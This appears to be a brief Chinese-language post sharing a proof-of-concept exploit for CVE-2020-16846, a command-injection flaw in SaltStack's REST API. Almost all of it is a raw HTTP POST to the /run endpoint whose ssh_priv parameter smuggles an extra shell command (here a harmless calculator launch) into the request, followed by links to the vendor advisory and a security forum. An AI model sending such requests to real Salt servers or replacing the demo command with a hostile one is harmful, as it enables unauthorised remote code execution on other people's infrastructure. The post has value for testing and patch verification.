# CVE-2020-16846 SaltStack远程执行代码漏洞
“`
PoC:
POST /run HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/x-yaml
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20open%20-a%20Calculator
“`
ref:
https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
https://forum.ywhack.com/thread-114703-1-4.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容